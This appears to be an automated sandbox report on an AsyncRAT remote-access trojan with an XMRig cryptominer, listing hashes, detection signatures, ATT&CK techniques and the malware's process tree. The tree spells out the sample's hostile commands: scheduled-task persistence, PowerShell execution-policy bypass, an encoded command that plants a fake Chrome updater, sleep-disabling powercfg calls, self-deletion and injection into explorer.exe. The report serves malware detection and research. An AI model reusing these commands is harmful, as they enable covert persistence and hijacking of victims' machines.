asyncrat | bbd275db0ec38e99c088654b042b682c428ba644969ef08f1d9657052f9b1393

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
04-07-2022 18:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0x000a000000003c9f-56.exe
Size

64KB
MD5

c75c0d8d46633692c979eb6fbd26094e
SHA1

b3945681b32a90f00ef2fd2af2eb4f5d4208c75d
SHA256

bbd275db0ec38e99c088654b042b682c428ba644969ef08f1d9657052f9b1393
SHA512

5d4ecd6c3fee2cf25cdfc4c6abbb389b261016b805ab1f6c4f0918143df6b02f0647d6ba87b1169ef0040ea9afd0dd22ce2612e2600b48e6dd9ffd7be99a1067

Score

10^/10

asyncrat xmrig linkvertise a miner rat suricata

Malware Config

Extracted

Family

asyncrat

Version

true

Botnet

Linkvertise A

Mutex

RRAT_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
Explorer.exe

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1264-130-0x0000000000790000-0x00000000007A6000-memory.dmp	asyncrat
C:\Users\Admin\AppData\Roaming\Explorer.exe	asyncrat
C:\Users\Admin\AppData\Roaming\Explorer.exe	asyncrat

XMRig Miner Payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/632-185-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/632-187-0x000000014036EAC4-mapping.dmp	xmrig
behavioral2/memory/632-188-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/632-189-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/632-192-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/632-195-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

osetmc.exeupdater.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	osetmc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 3 IoCs

Processes:

Explorer.exeosetmc.exeupdater.exe

pid process

1972 Explorer.exe
3204 osetmc.exe
2028 updater.exe

pid	process
1972	Explorer.exe
3204	osetmc.exe
2028	updater.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Explorer.exeosetmc.exeupdater.exe0x000a000000003c9f-56.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	Explorer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	osetmc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	0x000a000000003c9f-56.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

updater.exe

description pid process target process

PID 2028 set thread context of 632 2028 updater.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1240 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1544 timeout.exe

description	pid	process	target process
PID 2028 set thread context of 632	2028	updater.exe	explorer.exe

pid	process
1240	schtasks.exe

pid	process
1544	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

0x000a000000003c9f-56.exeExplorer.exepowershell.exeosetmc.exepowershell.exeupdater.exeexplorer.exe

pid	process
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1264	0x000a000000003c9f-56.exe
1972	Explorer.exe
3416	powershell.exe
3416	powershell.exe
3204	osetmc.exe
3872	powershell.exe
3872	powershell.exe
2028	updater.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
652

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

0x000a000000003c9f-56.exeExplorer.exepowershell.exeosetmc.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1264	0x000a000000003c9f-56.exe
Token: SeDebugPrivilege	1972	Explorer.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	3204	osetmc.exe
Token: SeShutdownPrivilege	800	powercfg.exe
Token: SeCreatePagefilePrivilege	800	powercfg.exe
Token: SeShutdownPrivilege	544	powercfg.exe
Token: SeCreatePagefilePrivilege	544	powercfg.exe
Token: SeShutdownPrivilege	5116	powercfg.exe
Token: SeCreatePagefilePrivilege	5116	powercfg.exe
Token: SeShutdownPrivilege	2688	powercfg.exe
Token: SeCreatePagefilePrivilege	2688	powercfg.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3872	powershell.exe
Token: SeSecurityPrivilege	3872	powershell.exe
Token: SeTakeOwnershipPrivilege	3872	powershell.exe
Token: SeLoadDriverPrivilege	3872	powershell.exe
Token: SeSystemProfilePrivilege	3872	powershell.exe
Token: SeSystemtimePrivilege	3872	powershell.exe
Token: SeProfSingleProcessPrivilege	3872	powershell.exe
Token: SeIncBasePriorityPrivilege	3872	powershell.exe
Token: SeCreatePagefilePrivilege	3872	powershell.exe
Token: SeBackupPrivilege	3872	powershell.exe
Token: SeRestorePrivilege	3872	powershell.exe
Token: SeShutdownPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeSystemEnvironmentPrivilege	3872	powershell.exe
Token: SeRemoteShutdownPrivilege	3872	powershell.exe
Token: SeUndockPrivilege	3872	powershell.exe
Token: SeManageVolumePrivilege	3872	powershell.exe
Token: 33	3872	powershell.exe
Token: 34	3872	powershell.exe
Token: 35	3872	powershell.exe
Token: 36	3872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3872	powershell.exe
Token: SeSecurityPrivilege	3872	powershell.exe
Token: SeTakeOwnershipPrivilege	3872	powershell.exe
Token: SeLoadDriverPrivilege	3872	powershell.exe
Token: SeSystemProfilePrivilege	3872	powershell.exe
Token: SeSystemtimePrivilege	3872	powershell.exe
Token: SeProfSingleProcessPrivilege	3872	powershell.exe
Token: SeIncBasePriorityPrivilege	3872	powershell.exe
Token: SeCreatePagefilePrivilege	3872	powershell.exe
Token: SeBackupPrivilege	3872	powershell.exe
Token: SeRestorePrivilege	3872	powershell.exe
Token: SeShutdownPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeSystemEnvironmentPrivilege	3872	powershell.exe
Token: SeRemoteShutdownPrivilege	3872	powershell.exe
Token: SeUndockPrivilege	3872	powershell.exe
Token: SeManageVolumePrivilege	3872	powershell.exe
Token: 33	3872	powershell.exe
Token: 34	3872	powershell.exe
Token: 35	3872	powershell.exe
Token: 36	3872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3872	powershell.exe
Token: SeSecurityPrivilege	3872	powershell.exe
Token: SeTakeOwnershipPrivilege	3872	powershell.exe
Token: SeLoadDriverPrivilege	3872	powershell.exe
Token: SeSystemProfilePrivilege	3872	powershell.exe
Token: SeSystemtimePrivilege	3872	powershell.exe
Token: SeProfSingleProcessPrivilege	3872	powershell.exe
Token: SeIncBasePriorityPrivilege	3872	powershell.exe
Token: SeCreatePagefilePrivilege	3872	powershell.exe

Suspicious use of FindShellTrayWindow 47 IoCs

Processes:

explorer.exe

pid	process
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe

Suspicious use of SendNotifyMessage 47 IoCs

Processes:

explorer.exe

pid	process
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe
632	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0x000a000000003c9f-56.execmd.execmd.exeExplorer.execmd.exepowershell.exeosetmc.execmd.execmd.exeupdater.execmd.exe

description	pid	process	target process
PID 1264 wrote to memory of 4668	1264	0x000a000000003c9f-56.exe	cmd.exe
PID 1264 wrote to memory of 4668	1264	0x000a000000003c9f-56.exe	cmd.exe
PID 1264 wrote to memory of 4668	1264	0x000a000000003c9f-56.exe	cmd.exe
PID 1264 wrote to memory of 4636	1264	0x000a000000003c9f-56.exe	cmd.exe
PID 1264 wrote to memory of 4636	1264	0x000a000000003c9f-56.exe	cmd.exe
PID 1264 wrote to memory of 4636	1264	0x000a000000003c9f-56.exe	cmd.exe
PID 4668 wrote to memory of 1240	4668	cmd.exe	schtasks.exe
PID 4668 wrote to memory of 1240	4668	cmd.exe	schtasks.exe
PID 4668 wrote to memory of 1240	4668	cmd.exe	schtasks.exe
PID 4636 wrote to memory of 1544	4636	cmd.exe	timeout.exe
PID 4636 wrote to memory of 1544	4636	cmd.exe	timeout.exe
PID 4636 wrote to memory of 1544	4636	cmd.exe	timeout.exe
PID 4636 wrote to memory of 1972	4636	cmd.exe	Explorer.exe
PID 4636 wrote to memory of 1972	4636	cmd.exe	Explorer.exe
PID 4636 wrote to memory of 1972	4636	cmd.exe	Explorer.exe
PID 1972 wrote to memory of 4840	1972	Explorer.exe	cmd.exe
PID 1972 wrote to memory of 4840	1972	Explorer.exe	cmd.exe
PID 1972 wrote to memory of 4840	1972	Explorer.exe	cmd.exe
PID 4840 wrote to memory of 3416	4840	cmd.exe	powershell.exe
PID 4840 wrote to memory of 3416	4840	cmd.exe	powershell.exe
PID 4840 wrote to memory of 3416	4840	cmd.exe	powershell.exe
PID 3416 wrote to memory of 3204	3416	powershell.exe	osetmc.exe
PID 3416 wrote to memory of 3204	3416	powershell.exe	osetmc.exe
PID 3204 wrote to memory of 4316	3204	osetmc.exe	cmd.exe
PID 3204 wrote to memory of 4316	3204	osetmc.exe	cmd.exe
PID 4316 wrote to memory of 800	4316	cmd.exe	powercfg.exe
PID 4316 wrote to memory of 800	4316	cmd.exe	powercfg.exe
PID 4316 wrote to memory of 544	4316	cmd.exe	powercfg.exe
PID 4316 wrote to memory of 544	4316	cmd.exe	powercfg.exe
PID 4316 wrote to memory of 5116	4316	cmd.exe	powercfg.exe
PID 4316 wrote to memory of 5116	4316	cmd.exe	powercfg.exe
PID 4316 wrote to memory of 2688	4316	cmd.exe	powercfg.exe
PID 4316 wrote to memory of 2688	4316	cmd.exe	powercfg.exe
PID 3204 wrote to memory of 3872	3204	osetmc.exe	powershell.exe
PID 3204 wrote to memory of 3872	3204	osetmc.exe	powershell.exe
PID 3204 wrote to memory of 4664	3204	osetmc.exe	cmd.exe
PID 3204 wrote to memory of 4664	3204	osetmc.exe	cmd.exe
PID 4664 wrote to memory of 3716	4664	cmd.exe	choice.exe
PID 4664 wrote to memory of 3716	4664	cmd.exe	choice.exe
PID 2028 wrote to memory of 3548	2028	updater.exe	cmd.exe
PID 2028 wrote to memory of 3548	2028	updater.exe	cmd.exe
PID 3548 wrote to memory of 3860	3548	cmd.exe	powercfg.exe
PID 3548 wrote to memory of 3860	3548	cmd.exe	powercfg.exe
PID 3548 wrote to memory of 3732	3548	cmd.exe	powercfg.exe
PID 3548 wrote to memory of 3732	3548	cmd.exe	powercfg.exe
PID 3548 wrote to memory of 3632	3548	cmd.exe	powercfg.exe
PID 3548 wrote to memory of 3632	3548	cmd.exe	powercfg.exe
PID 2028 wrote to memory of 4268	2028	updater.exe	conhost.exe
PID 2028 wrote to memory of 4268	2028	updater.exe	conhost.exe
PID 2028 wrote to memory of 4268	2028	updater.exe	conhost.exe
PID 3548 wrote to memory of 2604	3548	cmd.exe	powercfg.exe
PID 3548 wrote to memory of 2604	3548	cmd.exe	powercfg.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe
PID 2028 wrote to memory of 632	2028	updater.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\0x000a000000003c9f-56.exe
"C:\Users\Admin\AppData\Local\Temp\0x000a000000003c9f-56.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1264

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Explorer" /tr '"C:\Users\Admin\AppData\Roaming\Explorer.exe"' & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:4668

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Explorer" /tr '"C:\Users\Admin\AppData\Roaming\Explorer.exe"'
3⤵
- Creates scheduled task(s)
PID:1240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFAEF.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:4636

C:\Windows\SysWOW64\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:1544

C:\Users\Admin\AppData\Roaming\Explorer.exe
"C:\Users\Admin\AppData\Roaming\Explorer.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\osetmc.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:4840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\osetmc.exe"'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3416

C:\Users\Admin\AppData\Local\Temp\osetmc.exe
"C:\Users\Admin\AppData\Local\Temp\osetmc.exe"
6⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3204

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
7⤵
- Suspicious use of WriteProcessMemory
PID:4316

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:544

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5116

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AawBuACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACIAJwApACAAPAAjAHUAYgAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuACkAIAA8ACMAYQBuACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAcABjAHAAYQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAaQBvAGkAbgAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAG8AcwBlAHQAbQBjAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAHQAdwAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAcgBnACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\osetmc.exe"
7⤵
- Suspicious use of WriteProcessMemory
PID:4664

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
8⤵
PID:3716

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:3548

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:3860

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:3732

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:3632

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:2604

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "dggflaynvupj"
2⤵
PID:4268

C:\Windows\explorer.exe
C:\Windows\explorer.exe iaksldfjay0 6E3sjfZq2rJQaxvLPmXgsAaJL0DB0Mzj1hMFCmTULB1n9LKJbqR3eVDuPucevfH0b+OPIvkK2Xyez82evvYGdcDpLl7Y66K6fxf6jfs4VGo3ULwYEVRHZvjLiXSITyhyphzcH9wfrjUtJScs0gscUFkeL2zRe6Hgg/WeyJqRunq35vECVFMq1WYi79T7a9OKv63MNmu8FG6+Qpuz7I3zqyU+nSC30poDPmP3SJI4wTieDZbNX+dDx0QqoemoKQ27N096XA8oSOcO03I8W7hX3u14mAeQMpwlIsC/foEE1yBwV8MTK1Bm0vfU6+F+pfHyf+iW+tYbh1ONx0STw3ukkWeroVrIDCya/y2xfhhQkYEw7xdcDGf0vUV5cXTufNNT4Cv4AHxLbFhgUAu3s4CbmsDvAR1Ajz4q35X12QfsaFwLTXsjStOYGEmlponKU4ml
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:632

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
15KB

MD5
7aefba7412be4e2b87dd4faadf675187

SHA1
e6b7f5cdb5d61fc280bff7e3916ba61ab068c6bc

SHA256
1ef4ed408e905a4446a537a62a0168421336b89792547a24a70be366af8edcf4

SHA512
087ba529fb4995486fc868d564daa2eec209ace517d59d7028e4f0e896b71fc871d34547d1efa62e600fd7f3b6b53fbe6415bb41e319cca02d7dd41698ece6de

Download Submit
C:\Users\Admin\AppData\Local\Temp\osetmc.exe
Filesize
4.1MB

MD5
85003917e913d597b23b45905f42834e

SHA1
62182aa2983dbc8653d7dd8639daf40f2e381c30

SHA256
427c9eb0e789ed6175fb3127d61a551785f2e09b3d2672f253600b66e3b76a4e

SHA512
ebdb5f9a819adea1c29057930ca47187120e207d155831dcab7ab9f816e1c992a14698f4e068d57edf23d66ed746eeb1e60fc623ed2174c116ba1fde2ef9dd48

Download Submit
C:\Users\Admin\AppData\Local\Temp\osetmc.exe
Filesize
4.1MB

MD5
85003917e913d597b23b45905f42834e

SHA1
62182aa2983dbc8653d7dd8639daf40f2e381c30

SHA256
427c9eb0e789ed6175fb3127d61a551785f2e09b3d2672f253600b66e3b76a4e

SHA512
ebdb5f9a819adea1c29057930ca47187120e207d155831dcab7ab9f816e1c992a14698f4e068d57edf23d66ed746eeb1e60fc623ed2174c116ba1fde2ef9dd48

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpFAEF.tmp.bat
Filesize
152B

MD5
297df61cca1a899fb48b039a2a6028a1

SHA1
a028cf0523ae22d6525190d79eb3e30dc4373b4c

SHA256
6586c6967ad9b01c4b9929a8feb7c70bdf4fa82ba13a63cf712d4068384ccf34

SHA512
d937bb074a183f75db1b3340dae072a9e2827d2df97583ed36235f1f90cb9c347cd2302f2b4c437d97f9c3689ee4028a4f81892866cfab3e9841674bf50468d4

Download Submit
C:\Users\Admin\AppData\Roaming\Explorer.exe
Filesize
64KB

MD5
c75c0d8d46633692c979eb6fbd26094e

SHA1
b3945681b32a90f00ef2fd2af2eb4f5d4208c75d

SHA256
bbd275db0ec38e99c088654b042b682c428ba644969ef08f1d9657052f9b1393

SHA512
5d4ecd6c3fee2cf25cdfc4c6abbb389b261016b805ab1f6c4f0918143df6b02f0647d6ba87b1169ef0040ea9afd0dd22ce2612e2600b48e6dd9ffd7be99a1067

Download Submit
C:\Users\Admin\AppData\Roaming\Explorer.exe
Filesize
64KB

MD5
c75c0d8d46633692c979eb6fbd26094e

SHA1
b3945681b32a90f00ef2fd2af2eb4f5d4208c75d

SHA256
bbd275db0ec38e99c088654b042b682c428ba644969ef08f1d9657052f9b1393

SHA512
5d4ecd6c3fee2cf25cdfc4c6abbb389b261016b805ab1f6c4f0918143df6b02f0647d6ba87b1169ef0040ea9afd0dd22ce2612e2600b48e6dd9ffd7be99a1067

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.1MB

MD5
85003917e913d597b23b45905f42834e

SHA1
62182aa2983dbc8653d7dd8639daf40f2e381c30

SHA256
427c9eb0e789ed6175fb3127d61a551785f2e09b3d2672f253600b66e3b76a4e

SHA512
ebdb5f9a819adea1c29057930ca47187120e207d155831dcab7ab9f816e1c992a14698f4e068d57edf23d66ed746eeb1e60fc623ed2174c116ba1fde2ef9dd48

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.1MB

MD5
85003917e913d597b23b45905f42834e

SHA1
62182aa2983dbc8653d7dd8639daf40f2e381c30

SHA256
427c9eb0e789ed6175fb3127d61a551785f2e09b3d2672f253600b66e3b76a4e

SHA512
ebdb5f9a819adea1c29057930ca47187120e207d155831dcab7ab9f816e1c992a14698f4e068d57edf23d66ed746eeb1e60fc623ed2174c116ba1fde2ef9dd48

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
892B

MD5
ffe7c3baa6bda096898ad55fc2274b4f

SHA1
